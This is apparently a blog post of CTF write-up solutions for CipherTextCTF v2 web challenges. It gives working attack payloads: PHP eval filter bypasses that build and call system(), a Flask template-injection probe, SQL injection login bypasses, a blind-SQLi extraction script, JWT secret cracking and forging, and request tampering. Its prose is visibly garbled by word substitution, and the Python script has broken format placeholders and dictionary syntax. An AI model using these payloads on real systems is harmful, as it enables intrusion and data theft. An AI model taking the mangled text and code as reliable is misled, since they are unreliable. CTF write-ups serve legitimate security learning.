Capture The Flag CipherTextCTF v2 Capture the Flag Answers

CipherTextCTF v2 Capture the Flag Answers

Hi Friends, Today we’ll share the solutions of one popular Capture the Flag write up i.e. CipherTextCTF V2. Lets undergo the it step by step.

BabyPHP Level 1

Solution of Baby PHP Level1:

The problem is fundamental , it get input utilizing php wrapper php://input in put up request physique then un-serialize examine num variable with “13622”
So the payload shall be like this: a:1:s:3:”num”;i:13622;

Flag: CTCTFB4by_Php_l3v3L_1_P4s53d

BabyPHP Level 2

Solution of BabyPHP Level 2:

First we have to analyze the code , it take POST request with cmd parameter and might’t have greater than two consecutive letter and no dots (.) or opening sq. brace ( [ ) also cmd should be less than 100 character.

If we pass the check , we can run eval!
The challenge can be solved in two ways ( maybe more depend on your php skills )

First Method (PHP Variable Variables):

We need to list files
   $e='ls';
   $c='sy';
   $c='st';
   $c='em';
   $d="$c$c$c";
   $d($e);

Payload: $c='sy';%0a$c='st';%0a$c='em';%0a$d="$c$c$c";%0a$d('ls');

Read flag mysecretflag2020ctctf_2020.txt ( easy way )
    $e='ca';
    $e='t ';
    $e='*';
    $c='sy';
    $c='st';
    $c='em';
    $d="$c$c$c";
    $d("$e$e$e");

Payload: $e="ca";%0a$e="t%20";%0a$e="m*";%0a$c="sy";%0a$c="st";%0a$c="em";%0a$d="$c$c$c";%0a$d("$e$e$e");
 
Flag: CTCTFb4By_PhP_l3v3L_2_D0n3!!

Second Method ( PHP Multi-line String):

Listing files 
        $a=em;
        $b=st;
        $A=<<<Z
        sy$b$a // system
        Z;
        $B=ls;
        ?><?=$A($B)?> // <?= "test" ?> === <?php echo "test" ?>

Payload: $a=em;%0a$b=st;%0a$A=<<<Z%0asy$b$a%0aZ;%0a$B=ls;%0a?><?=$A($B)?>
    
    Reading flag:
        $a='em';
        $b='st';
        $A=<<<Z
        sy$b$a
        Z;
        $c='t%20';
        $e='m*';
        $B=<<<Z
        ca$c$e
        Z;
        $A($B);

Payload: $a='em';%0a$b='st';%0a$A=<<<Z%0asy$b$a%0aZ;%0a$c='t%20';%0a$e='m*';%0a$B=<<<Z%0aca$c$e%0aZ;%0a$A($B);
     
Flag: CTCTFb4By_PhP_l3v3L_2_D0n3!!

Recipes Blog

Solution of Recipes Blog:

We have a simple blog and have a search bar , if you type “test” , it will reflect to us .

So if we try SSTI Flask payload “ 7*’7′ ” it will return 7777777

We can check configuration by typing “ config.items() ”

Flag: CTCTFFl4sk_SSt1_N3v3r_Die!!

Blog

Solution of Blog:

After making directory bruteforce , there’s wordpress in /secret , so when we run wpscan there’s a plugin vulnerable to LFI , flag in /home/ctctf/flag.txt

SQLI101

Solution of SQLI101:

sqli101 has a filter in all comments and “=” , so we can try to login to admin account by typing ( admin’or’1′<‘2 )

SQLI102

Solution of SQLI102:

sqli102 has filter in space and all comments , you can solve it in multiple way and it’s blind sql injection , bypassing comments can be done with (‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’, ‘%a0’, ‘()’ ) , and i decided to solve it with ‘()’

Payload: admin’and(ascii(substr((select(password)from(users)where(username=”admin”)),1,1))>1)and’1’=’1

#!/usr/bin/python
import requests
from pwn import *
import string

url = "http://127.0.0.1/ciphertextv2/challenge7/admin.php"

flag = ""
length = 1
letters = string.printable

while length<70:
	for i in letters:
		payload = """admin'and(ascii(substr((select(password)from(users)where(username="admin")),,))=)and'1'='1""".format(str(length),str(length),ord(i))
		response = requests.post(url,data="username":payload,"password":"ss","login":"Login")
		if "Correct" in response.text:
			log.success("Correct")
			flag += i
	length += 1
print flag

Flag: CTCTfClouD_Y0u_eXpl41n_h0W_Bl1nd_5ql_inj3ct10n_w0rK_MaNu4l?

BeAdmin

Solution of BeAdmin:

First we have a login page and we need a valid creds ,(no sql injection) . valid creds ( guest:guest )

After login we can see there’s JWT token assigned we can see there’s attribute called userid , so we need to crack jwt secret

https://github.com/aress31/jwtcat.git

python3 jwtcat.py -t eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyaWQiOiJiZjU1YjYzNjI0NGM1OTc5NzA2ODBiOWNlMmZkZmUwNyIsImlhdCI6MTU4ODE2MjcyNH0.dgt5rsnCHRgs3P7SbDyZRfxDJGW766rc-UUk_8U3hEc -w /root/Desktop/HTB/rockyou.txt

secret key: aciddezoxiribonucleic

Now let’s see the userid , userid: bf55b636244c597970680b9ce2fdfe07 it’s reversed md5 (17) , so you can write a code to bruteforce from 1 to any number .
admin userid is (108) -> md5 -> reverse , and generate jwt with secret key to send request with it .

Flag: CTCTFBr43k1nG_J50n_W3b_T0k3n

Store

Solution of Store:

The idea is we cann’t borrow more than 500 and flag is 1337, but when we buy flag or any item there’s CSRF token and this token have the balance .

“username”:”m4rv3l”,”balance”:500,”timestamp”:1588170035

so we can edit the balance and send request to buy the flag

“username”:”m4rv3l”,”balance”:5000,”timestamp”:1588170035 -> base64

Bypass Me

Solution of Bypass Me:

PHP Type Juggling , we can use post parameter as array to give true and the value different to give true for check .

Payload: username[]=a&password[]=b

That’s it we’re executed with CipherTextCTF v2.

LEAVE A REPLY

Please enter your comment!
Please enter your name here